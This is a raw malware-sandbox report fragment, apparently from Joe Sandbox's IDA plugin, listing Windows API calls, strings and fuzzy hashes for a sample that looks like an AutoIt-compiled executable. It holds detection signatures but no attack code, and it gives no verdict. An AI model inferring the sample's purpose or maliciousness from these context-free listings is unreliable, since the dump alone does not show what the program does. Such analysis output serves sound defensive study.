                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0063EA84
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0063EA96
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0063EAA7
                                                                                Similarity
                                                                                • API ID: SendString$_wcslen
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 2420728520-1007645807
                                                                                • Opcode ID: 195235399f950cd644a8c1e1d4b993336506521721ee3e19b5bfeb484eac08e1
                                                                                • Instruction ID: c87eea955759dd34d751e49ef8539c1f4444fee68456355d9d768312b2bfc6bd
                                                                                • Opcode Fuzzy Hash: 195235399f950cd644a8c1e1d4b993336506521721ee3e19b5bfeb484eac08e1
                                                                                • Instruction Fuzzy Hash: 06117331A9036A79DB20A7A6DD4AEFF6E7DFBD1B40F01042AB411A21D1EEB05D05C5B1
APIs
  • Part of subcall function 005E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005E8BE8,?,00000000,?,?,?,?,005E8BBA,00000000,?), ref: 005E8FC5
• DestroyWindow.USER32(?), ref: 005E8C81
• KillTimer.USER32(00000000,?,?,?,?,005E8BBA,00000000,?), ref: 005E8D1B
• DestroyAcceleratorTable.USER32(00000000), ref: 00626973
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,005E8BBA,00000000,?), ref: 006269A1
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,005E8BBA,00000000,?), ref: 006269B8
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,005E8BBA,00000000), ref: 006269D4
• DeleteObject.GDI32(00000000), ref: 006269E6
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 1299260aad6e50dd365dd51d28b0e76bb1de7c63465779cc3b430b9a7832392f
• Instruction ID: fa8a424010f92bf94625f5763aaeda49e756d286cd33ccc23dbb5f47240d54e5
• Opcode Fuzzy Hash: 1299260aad6e50dd365dd51d28b0e76bb1de7c63465779cc3b430b9a7832392f
• Instruction Fuzzy Hash: 96619130502A51DFCB299F15D948B767BF2FB42311F145919E0CA9E660CB71BC80DF90
APIs
  • Part of subcall function 005E9944: GetWindowLongW.USER32(?,000000EB), ref: 005E9952
• GetSysColor.USER32(0000000F), ref: 005E9862
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: ed5bee598cb7093d468bf59b62fdb5e58ebda4977f9204fb0f01d918bc6323c4
• Instruction ID: 5f0eccb55afdd49c73ea71b3b2e18f3dc1a3c6eec349a0074481036037e357bc
• Opcode Fuzzy Hash: ed5bee598cb7093d468bf59b62fdb5e58ebda4977f9204fb0f01d918bc6323c4
• Instruction Fuzzy Hash: 6641D031108A90AFDB245F399C88BB97BA6BB17330F145615F9E28B2F2C7709C42DB51
Strings
Similarity
• API ID:
• String ID: ._
• API String ID: 0-1383207595
• Opcode ID: c6046da74ee32863bad3a33c0f03fcb4a48ad124705ae8c501155ea5c34e6372
• Instruction ID: 1bc72fd4f94b1963cc535db4c2a95a361662a8a41649221d6c4421be916310c1
• Opcode Fuzzy Hash: c6046da74ee32863bad3a33c0f03fcb4a48ad124705ae8c501155ea5c34e6372
• Instruction Fuzzy Hash: C0C1F27494424A9FDB19EFA8C844BEEBBB3BF4A310F044099E955A73D2C7349941CB70
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0061F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00639717
• LoadStringW.USER32(00000000,?,0061F7F8,00000001), ref: 00639720
  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0061F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00639742
• LoadStringW.USER32(00000000,?,0061F7F8,00000001), ref: 00639745
• MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00639866
Strings
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 747408836-2268648507
• Opcode ID: 5828af9b1a7394cbff7f5b2cbb1dc24a81d49677af25b149ce1c15bbe75889a9
• Instruction ID: 5d55f9f25c88d84af912bc4ef2c077a8fae9106387a3cceb7d2ed8518f08cd90
• Opcode Fuzzy Hash: 5828af9b1a7394cbff7f5b2cbb1dc24a81d49677af25b149ce1c15bbe75889a9
• Instruction Fuzzy Hash: 1D41507290020AAADF14EBE4DE4ADEE7B79AF95740F100426F101B2191EA756F49CFA1
APIs
  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006307A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006307BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006307DA
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00630804
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0063082C
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00630837
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0063083C
Strings
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
• Opcode ID: 7b03e52151ff13ec20abf16daec52e6b4b2053f514f2baabd3bdcbf9de74e1b2
• Instruction ID: d7efc9aa40a2554b778dfce0577433214c049fc89ee7dce00d7e17342361b4dd
• Opcode Fuzzy Hash: 7b03e52151ff13ec20abf16daec52e6b4b2053f514f2baabd3bdcbf9de74e1b2
• Instruction Fuzzy Hash: 5D411D71C10229ABDF21EF98DC99DEDBB79FF44750F14416AE901A3261EB709E04CB90
APIs
• VariantInit.OLEAUT32(?), ref: 00653C5C
• CoInitialize.OLE32(00000000), ref: 00653C8A
• CoUninitialize.OLE32 ref: 00653C94
• _wcslen.LIBCMT ref: 00653D2D
• GetRunningObjectTable.OLE32(00000000,?), ref: 00653DB1
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00653ED5
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00653F0E
• CoGetObject.OLE32(?,00000000,0066FB98,?), ref: 00653F2D
• SetErrorMode.KERNEL32(00000000), ref: 00653F40
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00653FC4
• VariantClear.OLEAUT32(?), ref: 00653FD8
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: e09a86eb05eba53ebefbf49462dd3f29b209308a4595083592f206f992157ba3
• Instruction ID: f3279b7ea6d2b34149e2c4aae29f0e3c88a5b5e1db50e6a82c2fb60223ce9937
• Opcode Fuzzy Hash: e09a86eb05eba53ebefbf49462dd3f29b209308a4595083592f206f992157ba3
• Instruction Fuzzy Hash: A4C124716082159FD710DF68C88496BBBEAFF89B85F00491EF9899B310DB71ED09CB52
APIs
• CoInitialize.OLE32(00000000), ref: 00647AF3
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00647B8F
• SHGetDesktopFolder.SHELL32(?), ref: 00647BA3
• CoCreateInstance.OLE32(0066FD08,00000000,00000001,00696E6C,?), ref: 00647BEF
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00647C74
• CoTaskMemFree.OLE32(?,?), ref: 00647CCC
• SHBrowseForFolderW.SHELL32(?), ref: 00647D57
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00647D7A
• CoTaskMemFree.OLE32(00000000), ref: 00647D81
• CoTaskMemFree.OLE32(00000000), ref: 00647DD6
• CoUninitialize.OLE32 ref: 00647DDC
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: 3570a2e4f9f95c0a9f176dc87ff161083de5da56f841540cc7dae6a1de3436b3
• Instruction ID: 57e7c121dc91bd78a6fb06850a4ec7e7e7511043d99757078594753bc4d2ce0b
• Opcode Fuzzy Hash: 3570a2e4f9f95c0a9f176dc87ff161083de5da56f841540cc7dae6a1de3436b3
• Instruction Fuzzy Hash: 1FC11C75A04119AFDB14DFA4C888DAEBBFAFF48314B148499E819DB361DB30ED45CB90
APIs
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00665504
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00665515
• CharNextW.USER32(00000158), ref: 00665544
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00665585
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0066559B
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006655AC
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: 1688b3c95332405e2ecc8b66d3efe8495175d15ace4014b205ed329e4f86addf
• Instruction ID: e20b3f57d98ed2998ffe611bc43772205214bcb5c600b6ad5f5a729ec3a2ca8a
• Opcode Fuzzy Hash: 1688b3c95332405e2ecc8b66d3efe8495175d15ace4014b205ed329e4f86addf
• Instruction Fuzzy Hash: CC618030900609EFDF109F64CC869FE7BBBEF06724F104149F966AB290DB749A81DB61
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0062FAAF
• SafeArrayAllocData.OLEAUT32(?), ref: 0062FB08
• VariantInit.OLEAUT32(?), ref: 0062FB1A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0062FB3A
• VariantCopy.OLEAUT32(?,?), ref: 0062FB8D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 0062FBA1
• VariantClear.OLEAUT32(?), ref: 0062FBB6
• SafeArrayDestroyData.OLEAUT32(?), ref: 0062FBC3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0062FBCC
• VariantClear.OLEAUT32(?), ref: 0062FBDE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0062FBE9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: fadf3d4fadf97bf6e37b56ba335fa938d47199e9a3f1ba8368acf47878041347
                                                                                • Instruction ID: 07121b445461c080848b0c5d7805c651d129eedea14313d86a3750e718707440
                                                                                • Opcode Fuzzy Hash: fadf3d4fadf97bf6e37b56ba335fa938d47199e9a3f1ba8368acf47878041347
                                                                                • Instruction Fuzzy Hash: E7413E35A00619EFCB00DF68D8589EEBBBAFF48355F008079E945A7261CB70A945CFA0
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00639CA1
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00639D22
                                                                                • GetKeyState.USER32(000000A0), ref: 00639D3D
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00639D57
                                                                                • GetKeyState.USER32(000000A1), ref: 00639D6C
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00639D84
                                                                                • GetKeyState.USER32(00000011), ref: 00639D96
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00639DAE
                                                                                • GetKeyState.USER32(00000012), ref: 00639DC0
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00639DD8
                                                                                • GetKeyState.USER32(0000005B), ref: 00639DEA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 0b02bc90c1b0209ecabbceb4943271fb4eabe0ddd0cb61155f1719cd0e756690
                                                                                • Instruction ID: e110bc05ed279140b97dd4f8590073aa9db2726244df16d6b0aafccc5dec67f0
                                                                                • Opcode Fuzzy Hash: 0b02bc90c1b0209ecabbceb4943271fb4eabe0ddd0cb61155f1719cd0e756690
                                                                                • Instruction Fuzzy Hash: 9541C434904BCA6DFF30966488053F6BEA2AF11344F04905ADAC6567C2DBE499C8CFF2
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 006505BC
                                                                                • inet_addr.WSOCK32(?), ref: 0065061C
                                                                                • gethostbyname.WSOCK32(?), ref: 00650628
                                                                                • IcmpCreateFile.IPHLPAPI ref: 00650636
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006506C6
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006506E5
                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 006507B9
                                                                                • WSACleanup.WSOCK32 ref: 006507BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: feceaba10f9407e8dbfccbf1974d615bced1f52e0c0ece8803f9cf1c15d6e7cd
                                                                                • Instruction ID: a5a1834051eca0195311beacea884334cf6ec887432b3e44d618d0ed672cdb96
                                                                                • Opcode Fuzzy Hash: feceaba10f9407e8dbfccbf1974d615bced1f52e0c0ece8803f9cf1c15d6e7cd
                                                                                • Instruction Fuzzy Hash: E3918F755042029FE320DF15C588F56BBE2BF88318F1485A9F8A98B7A2D770ED49CF81
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 707087890-567219261
                                                                                • Opcode ID: 8640879aa67072bdad1e666cb4e3611b9a5c8228e64d20bf1ca5e20c4f1d3b70
                                                                                • Instruction ID: 0671e84c3531e38ab7b0cf08ddc4449313f2e259df9819b7a2ae9b091bd4cf26
                                                                                • Opcode Fuzzy Hash: 8640879aa67072bdad1e666cb4e3611b9a5c8228e64d20bf1ca5e20c4f1d3b70
                                                                                • Instruction Fuzzy Hash: 23519D31A001169ECB24DF68C9418FEB7B6BFA4721B20422AE866F7784DB35DD458B90
                                                                                APIs
                                                                                • CoInitialize.OLE32 ref: 00653774
                                                                                • CoUninitialize.OLE32 ref: 0065377F
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,0066FB78,?), ref: 006537D9
                                                                                • IIDFromString.OLE32(?,?), ref: 0065384C
                                                                                • VariantInit.OLEAUT32(?), ref: 006538E4
                                                                                • VariantClear.OLEAUT32(?), ref: 00653936
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 636576611-1287834457
                                                                                • Opcode ID: 9e773745e86bbc2722a4a5bc96e0f34ab7390154a451bf6d93f6c50a50ff3faf
                                                                                • Instruction ID: 2687b543cc9e095b3a627cbf083a50df9d6b81da31062d0d7db7bca706ee3116
                                                                                • Opcode Fuzzy Hash: 9e773745e86bbc2722a4a5bc96e0f34ab7390154a451bf6d93f6c50a50ff3faf
                                                                                • Instruction Fuzzy Hash: A761C3B06083119FD310DF54C848B6ABBEAEF48B51F00080EF9859B391D770EE49CB96
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                  • Part of subcall function 005E912D: GetCursorPos.USER32(?), ref: 005E9141
                                                                                  • Part of subcall function 005E912D: ScreenToClient.USER32(00000000,?), ref: 005E915E
                                                                                  • Part of subcall function 005E912D: GetAsyncKeyState.USER32(00000001), ref: 005E9183
                                                                                  • Part of subcall function 005E912D: GetAsyncKeyState.USER32(00000002), ref: 005E919D
                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00668B6B
                                                                                • ImageList_EndDrag.COMCTL32 ref: 00668B71
                                                                                • ReleaseCapture.USER32 ref: 00668B77
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00668C12
                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00668C25
                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00668CFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#j
                                                                                • API String ID: 1924731296-3521160299
                                                                                • Opcode ID: f06f596df0e8056dc95074f92aa549d46f72a0510c307e13817584fdf0280bba
                                                                                • Instruction ID: d67ca378416e402af905541a299ad18a223957b657835bf74554b69a3ce06777
                                                                                • Opcode Fuzzy Hash: f06f596df0e8056dc95074f92aa549d46f72a0510c307e13817584fdf0280bba
                                                                                • Instruction Fuzzy Hash: 43517D70104345AFD714EF24DC5AFAA7BE6FB85714F00062EF996972A1CB71AD04CB62
                                                                                APIs
                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006433CF
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006433F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$_wcslen
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 4099089115-3080491070
                                                                                • Opcode ID: 79188160d8c9f8e4cc19538f8fb9b4b99cff5a1de474c89612e7ad9a8519272d
                                                                                • Instruction ID: 5828981aab4dad86e1ccdc21bb3772fb76c2936f21bd3a1bcd32a145e8c012df
                                                                                • Opcode Fuzzy Hash: 79188160d8c9f8e4cc19538f8fb9b4b99cff5a1de474c89612e7ad9a8519272d
                                                                                • Instruction Fuzzy Hash: 7551C37190021AAADF24EBE4CD46EEEBB7ABF54740F104066F405722A1EB712F58DF61
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                • API String ID: 1256254125-769500911
                                                                                • Opcode ID: ec78ff44404e4fd00ba710977c73a0a08e23d73c96da6041e1476ee54f5aa4c2
                                                                                • Instruction ID: dd908bad93d1ce31b0aee563342615ca599178ef9b57752c9257bf1e4fbff34b
                                                                                • Opcode Fuzzy Hash: ec78ff44404e4fd00ba710977c73a0a08e23d73c96da6041e1476ee54f5aa4c2
                                                                                • Instruction Fuzzy Hash: CB41F332A001279ACB205E7DC9925FE7BA6BBA2754F245129E621DB385E731CC81C7D0
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 006453A0
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00645416
                                                                                • GetLastError.KERNEL32 ref: 00645420
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 006454A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: 67ff6af5a45fc86db349dc1e039d3596bd56b02062e8fe500ba5c7521e02e210
                                                                                • Instruction ID: df34ea42077dd93a64679dbab0a85e83b8af13cbc21152acdb305ec2ec275fa1
                                                                                • Opcode Fuzzy Hash: 67ff6af5a45fc86db349dc1e039d3596bd56b02062e8fe500ba5c7521e02e210
                                                                                • Instruction Fuzzy Hash: 8F316D35A006059FCB10DF68C488AEABBFAEF45345F148066E406DF3A2DB71DD86CB91
                                                                                APIs
                                                                                • CreateMenu.USER32 ref: 00663C79
                                                                                • SetMenu.USER32(?,00000000), ref: 00663C88
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00663D10
                                                                                • IsMenu.USER32(?), ref: 00663D24
                                                                                • CreatePopupMenu.USER32 ref: 00663D2E
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00663D5B
                                                                                • DrawMenuBar.USER32 ref: 00663D63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                • String ID: 0$F
                                                                                • API String ID: 161812096-3044882817
                                                                                • Opcode ID: 3472c236989a0ab27a939e945e624f98501ae22ec9dea5f4b9798ceebf6b62f3
                                                                                • Instruction ID: e293b60c4fa45ac87f6b27b5bc410afb4029268dcf8cd9216fe39f7fd4a54d5c
                                                                                • Opcode Fuzzy Hash: 3472c236989a0ab27a939e945e624f98501ae22ec9dea5f4b9798ceebf6b62f3
                                                                                • Instruction Fuzzy Hash: 67415779A01619AFDB14DF64DC84AEA7BB6FF49350F140029F946A7360D770BA10CF94
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00663A9D
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00663AA0
